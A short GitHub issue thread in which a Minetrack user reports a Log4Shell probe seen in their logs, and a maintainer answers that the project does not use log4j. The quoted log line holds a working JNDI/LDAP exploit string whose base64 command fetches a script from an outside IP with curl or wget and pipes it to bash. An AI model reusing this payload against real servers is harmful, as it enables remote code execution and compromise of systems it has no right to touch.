### ISSUE TITLE
jndi Request 

### ISSUE THREAD

**Issue by NurFabi** [Cryptkeeper/Minetrack#282]
Hey, 
I just checked the log on my Minetrack page and found something there that doesn't belong there.

There is the Log4j security hole and the logs said the following

"Requested: /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNDguMjUxLjE1MS4xMjE6ODA4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNDguMjUxLjE1MS4xMjE6ODA4MCl8YmFzaA==}"

Does this vulnerability still exist in Minetrack or has it already been fixed.

**Comment by ItzHoffe** [comment]
Minetrack is not using log4j/log4shell :)

**Comment by NurFabi** [comment]
ok thank you
